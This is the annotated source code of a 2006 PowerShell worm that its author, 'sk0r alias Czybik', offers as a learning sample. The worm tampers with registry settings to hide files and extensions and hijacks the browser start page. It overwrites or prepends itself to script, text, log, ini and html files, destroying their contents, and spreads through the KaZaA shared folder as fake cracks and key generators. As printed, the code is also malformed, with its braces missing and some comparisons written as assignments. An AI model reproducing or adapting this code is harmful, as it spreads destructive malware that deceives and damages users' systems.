PowerShell Variable Poly Worm
by sk0r alias Czybik
# #
# sk0r alias Czybik PowerShell Variable Poly Worm #
# =============================================== #
# #
# About how to contact sk0r alias Czybik: #
# ----------------------------------------- #
# Email-Address: sk0r1337@gmx.de #
# Homepages: www.sk0r-scripts.tk - www.sk0r-virii.tk - www.czybik-kit.tk #
# Irc-Channel: #vx-lab or #vxers @ undernet #
# #
# Informations about this worm : #
# ------------------------------ #
# This is the first PowerShell Worm which changes it #
# variable names everytime the worm runs. #
# The worm uses the two Objects (WScript.Shell #
# and Scripting.FileSystemObject ) #
# So this worm does the followthing explained shortly: #
# - Spreads per P2P Client KaZaA Lite #
# - Modifies some Registry values #
# - Change specific variables in the code in an array #
# - Overwrites .msh, .bat, .cmd, .log, .ini, .txt, .ps1, .js or .html files#
# - overwritten .msh or .ps1 files have our source at first and the file #
# source at second place. the other files listed above will be #
# overwritten. the extension will be changed to .msh #
# - The payload, a info message, will appear if the time is greater #
# then 17:00:00. It will show informations #
# #
# Structure of the worm: #
# ----------------------- #
# [Code] #
# 'explanation #
# #
# Note: Sorry about my bad english #
# If I would explain this in german everybody would understand #
# better. But I decided to comment the worm in english, because #
# everybody who codes in PowerShell can read and learn #
# form this worm. I needed some days do made this worm. because I #
# had no tutorials I had to find out the most commands myself. #
# So please email me, what you think of this worm #
# #
# <!-- StartCode -->
$fso = New-Object -Com Scripting.FileSystemObject ;
$sysdir = $fso.GetSpecialFolder(1) ;
$wshs = New-Object -Com WScript.Shell ;
$ArrayVars = ("fso","wshs","ArrayVars","sysdir","gtFileSize","AllMshDateinCurDir","KazaaDir","gtMySelfToCopy","NormalName",
"gtFilesToInfect","InfectAllFilesNow","gtCurrentDate","intRandomNumb","AscString","VictimDateien","gtvicpscon","gtvicmshcon") ;
$gtFileSize = 14370 ;
$AllMshDateinCurDir = get-childitem *.msh ;
# here we declare five variables. $fso creates the
# Scripting.FileSystemObject. the $wshs creates
# the WScript.Shell Object. The Variable $ArrayVars
# contains all variable names we want to change by each run
# $gtFileSize contains the file size as integer
# $AllMshDateinCurDir contains all msh files in current direcory
# =======================================================
$intHomepage = (new-object Random).Next(1*3)
if ($intHomepage -eq 0)
$strHomepage = "http://www.sk0r-scripts.tk";
elseif ($intHomepage -eq 1)
$strHomepage = "http://www.sk0r-virii.tk";
elseif ($intHomepage -eq 2)
$strHomepage = "http://www.czybik-kit.tk";
# Here we create a random number from 1 till 3.
# for each value the variable $strHomepages
# contains a other homepage address
# ===========================================
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD");
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD");
$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Infected Poly","REG_SZ");
$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "sk0rCzybik","REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Infected by a poly ps worm","REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "$strHomepage")
# Here we write some registry values to the
# system registry. Our homepage address will
# be adden, too. After changing the values the
# user cant see hidden files and file extensions.
# the registered organisation will be changed to
# Infected Poly, the registered owner will be changed
# to sk0rCzybik and the Title of the internet explorer
# will be changed to Infected by a poly ps worm
foreach ($PowerShellScript in $AllMshDateinCurDir)
if ($PowerShellScript.Length=$gtFileSize)
$MySelfWorm = $PowerShellScript.Name;
# this loop checks all msh files in the current directory
# if a files exists with our searched file size, the
# variable $MySelfWorm contains the path and the name
# to our worm
# ===================================================
$opnMyForRead = $fso.OpenTextFile($MySelfWorm,1) ;
$ContentOfMyWorm = $opnMyForRead.ReadAll() ;
$opnMyForRead.Close() ;
# Here we open the worm (the file itself) for reading.
# the whole worm content will be contented by the
# variable $ContentOfMyWorm. After that
# we close our worm (the file itself).
# ====================================
$gtFilesToInfect = get-childitem *.*
foreach ($VictimDateien in $gtFilesToInfect)
foreach ($StringsToPoly in $ArrayVars)
for ($i = 0; $i -le $StringsToPoly.length; $i++)
$intRandomNumb = (new-object Random).next(1*27) ;
if ($intRandomNumb -eq 0)
$AscString = $AscString + "a";
elseif ($intRandomNumb -ne 0)
$AscString = $AscString + "";
if ($intRandomNumb -eq 1)
$AscString = $AscString + "b";
elseif ($intRandomNumb -ne 1)
$AscString = $AscString + "";
if ($intRandomNumb -eq 3)
$AscString = $AscString + "c";
elseif ($intRandomNumb -ne 3)
$AscString = $AscString + "";
if ($intRandomNumb -eq 4)
$AscString = $AscString + "d";
elseif ($intRandomNumb -ne 4)
$AscString = $AscString + "";
if ($intRandomNumb -eq 5)
$AscString = $AscString + "e";
elseif ($intRandomNumb -ne 5)
$AscString = $AscString + "";
if ($intRandomNumb -eq 6)
$AscString = $AscString + "f";
elseif ($intRandomNumb -ne 6)
$AscString = $AscString + "";
if ($intRandomNumb -eq 7)
$AscString = $AscString + "g";
elseif ($intRandomNumb -ne 7)
$AscString = $AscString + "";
if ($intRandomNumb -eq 8)
$AscString = $AscString + "h";
elseif ($intRandomNumb -ne 8)
$AscString = $AscString + "";
if ($intRandomNumb -eq 9)
$AscString = $AscString + "i";
elseif ($intRandomNumb -ne 9)
$AscString = $AscString + "";
if ($intRandomNumb -eq 10)
$AscString = $AscString + "j";
elseif ($intRandomNumb -ne 10)
$AscString = $AscString + "";
if ($intRandomNumb -eq 11)
$AscString = $AscString + "k";
elseif ($intRandomNumb -ne 11)
$AscString = $AscString + "";
if ($intRandomNumb -eq 12)
$AscString = $AscString + "l";
elseif ($intRandomNumb -ne 12)
$AscString = $AscString + "";
if ($intRandomNumb -eq 13)
$AscString = $AscString + "m";
elseif ($intRandomNumb -ne 13)
$AscString = $AscString + "";
if ($intRandomNumb -eq 14)
$AscString = $AscString + "n";
elseif ($intRandomNumb -ne 14)
$AscString = $AscString + "";
if ($intRandomNumb -eq 15)
$AscString = $AscString + "o";
elseif ($intRandomNumb -ne 15)
$AscString = $AscString + "";
if ($intRandomNumb -eq 16)
$AscString = $AscString + "p";
elseif ($intRandomNumb -ne 16)
$AscString = $AscString + "";
if ($intRandomNumb -eq 17)
$AscString = $AscString + "q";
elseif ($intRandomNumb -ne 17)
$AscString = $AscString + "";
if ($intRandomNumb -eq 18)
$AscString = $AscString + "r";
elseif ($intRandomNumb -ne 18)
$AscString = $AscString + "";
if ($intRandomNumb -eq 19)
$AscString = $AscString + "s";
elseif ($intRandomNumb -ne 19)
$AscString = $AscString + "";
if ($intRandomNumb -eq 20)
$AscString = $AscString + "t";
elseif ($intRandomNumb -ne 20)
$AscString = $AscString + "";
if ($intRandomNumb -eq 21)
$AscString = $AscString + "u";
elseif ($intRandomNumb -ne 21)
$AscString = $AscString + "";
if ($intRandomNumb -eq 22)
$AscString = $AscString + "v";
elseif ($intRandomNumb -ne 22)
$AscString = $AscString + "";
if ($intRandomNumb -eq 23)
$AscString = $AscString + "w";
elseif ($intRandomNumb -ne 23)
$AscString = $AscString + "";
if ($intRandomNumb -eq 24)
$AscString = $AscString + "x";
elseif ($intRandomNumb -ne 24)
$AscString = $AscString + "";
if ($intRandomNumb -eq 25)
$AscString = $AscString + "y";
elseif ($intRandomNumb -ne 25)
$AscString = $AscString + "";
if ($intRandomNumb -eq 26)
$AscString = $AscString + "z";
elseif ($intRandomNumb -ne 26)
$AscString = $AscString + "";
$ContentOfMyWorm = $ContentOfMyWorm.replace($StringsToPoly,$AscString);
Remove-Variable AscString
if ($VictimDateien = "msh")
$gtvicmshcon = get-content $VictimDateien.name ;
if ($gtvicmshcon[517] -ne "#sk0r alias Czybik")
del $VictimDateien.name ;
echo $ContentOfMyWorm >> $VictimDateien.name ;
echo $gtvicmshcon >> $VictimDateien.name ;
if ($VictimDateien = "ps1")
$gtvicpscon = get-content $VictimDateien.name ;
if ($gtvicpscon[517] -ne "#sk0r alias Czybik")
del $VictimDateien.name ;
echo $ContentOfMyWorm >> $VictimDateien.name ;
echo $gtvicpscon >> $VictimDateien.name ;
if ($VictimDateien = "bat")
$NormalName = $gtFilesToInfect.name ;
$EndName = $NormalName+".msh" ;
del VictimDateien.name ;
echo $ContentOfMyWorm >> VictimDateien.name ;
rename-item "$gtFilesToInfect" $EndName ;
if ($VictimDateien = "cmd")
$NormalName = $gtFilesToInfect.name ;
$EndName = $NormalName+".msh" ;
del VictimDateien.name ;
echo $ContentOfMyWorm >> VictimDateien.name ;
rename-item "$gtFilesToInfect" $EndName ;
if ($VictimDateien = "log")
$NormalName = $gtFilesToInfect.name ;
$EndName = $NormalName+".msh" ;
del VictimDateien.name ;
echo $ContentOfMyWorm >> VictimDateien.name ;
rename-item "$gtFilesToInfect" $EndName ;
if ($VictimDateien = "ini")
$NormalName = $gtFilesToInfect.name ;
$EndName = $NormalName+".msh" ;
del VictimDateien.name ;
echo $ContentOfMyWorm >> VictimDateien.name ;
rename-item "$gtFilesToInfect" $EndName ;
if ($VictimDateien = "txt")
$NormalName = $gtFilesToInfect.name ;
$EndName = $NormalName+".msh" ;
del VictimDateien.name ;
echo $ContentOfMyWorm >> VictimDateien.name ;
rename-item "$gtFilesToInfect" $EndName ;
if ($VictimDateien = "js")
$NormalName = $gtFilesToInfect.name ;
$EndName = $NormalName+".msh" ;
del VictimDateien.name ;
echo $ContentOfMyWorm >> VictimDateien.name ;
rename-item "$gtFilesToInfect" $EndName ;
if ($VictimDateien = "html")
$NormalName = $gtFilesToInfect.name ;
$EndName = $NormalName+".msh" ;
del VictimDateien.name ;
echo $ContentOfMyWorm >> VictimDateien.name ;
rename-item "$gtFilesToInfect" $EndName ;
# Ok, hope I can explain this in english so you can understand :-D
# The variable $gtFilesToInfect contains all files in the current
# directory. and for each file in the directory
# the for each string in the variable $ArrayVars a loop appears for
# each char in a string. for each char a random number will be created
# if the random number has a specific value the variable $AscString
# contains a specific char. The If Statement is arranged alphabetically.
# If all chars are looped, the string will be replaced with the new random
# string. This happens for all strings in the $ArrayVars Variable. For each
# string we need do delete the variable $AscString otherwise a new
# variable name is too long and a it adds each string to the next string.
# In the End the variable $ContentOfMyWorm contains the new
# Souce-Code with the new variable names.
# then wee look if msh or ps1 files exists in our direcory.
# if this is true we look if the file is infected. If not then
# we write our worm source at the first place and then write
# the normal source of the file at second place.
# Then we look if .bat, .cmd, .log, .ini, .txt, .js or .html files
# exists in our folder. If this is true, our worm overwrites the
# the file and changes the extension to .msh
# ==============================================================
$crtTheNewWorm = $fso.CreateTextFile("$sysdir\sk0rCzybik.msh");
# Here a new msh file with the new worm content will be created.
# =====================================================
$gtMySelfToCopy = $fso.getfile("$sysdir\sk0rCzybik.msh");
$KazaaDir = $wshs.RegRead('HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir');
if ($KazaaDir -ne "")
$gtMySelfToCopy = $fso.getfile($MySelfWorm)
$gtMySelfToCopy.copy("$KazaaDir\Microsoft Windows Vista Cd-Key.txt.msh");
$gtMySelfToCopy.copy("$KazaaDir\Windows Vista Update.msh");
$gtMySelfToCopy.copy("$KazaaDir\Ad-aware SE Personal Edition 1.06r1.msh");
$gtMySelfToCopy.copy("$KazaaDir\Ashampoo Media Player 2.03 install.msh");
$gtMySelfToCopy.copy("$KazaaDir\Allround WinZIP Key Generator.msh");
$gtMySelfToCopy.copy("$KazaaDir\Talisman Desktop 2.99 Crack.msh");
$gtMySelfToCopy.copy("$KazaaDir\Nero Burning Rom Crack.msh");
$gtMySelfToCopy.copy("$KazaaDir\Kaspersky KeyGen working.msh");
$gtMySelfToCopy.copy("$KazaaDir\Daemon Tools Install + Crack.rar.msh");
$gtMySelfToCopy.copy("$KazaaDir\AVP - AntiVirus Key Generator.msh");
# Here the variable Kazaa dir reads a registry key, which contains the
# path to the My Shared Folder path. If it exists the worm copys
# itself as some filenames in the My Shared Folder Directory.
# ===========================================================
$gtCurrentDate = get-date -DisplayHint time
if ($gtCurrentDate -gt "17:00:00")
$wshs.popup("This is the first polymorphic PowerShell Worm.
This Worm was written by sk0r alias Czybik.
This Worm is ©2006 by sk0r alias Czybik
To ask some questions email me @ sk0r1337@gmx.de
www.sk0r-scripts.tk - www.sk0r-virii.tk - www.czybik-kit.tk ",10,"PowerShell Polymorphic Worm ©2006 by sk0r alias Czybik");
# the Variable gtCurrentDate uses the function get-date with parameter time
# to get the current time. If the time is greater the 17:00:00 a popup
# message will appear.
# ==================================================================
exit ;
# This command exits the script
# ====================
# <!-- End Code -->
# This Worm is ©2006 by sk0r alias Czybik.
#sk0r alias Czybik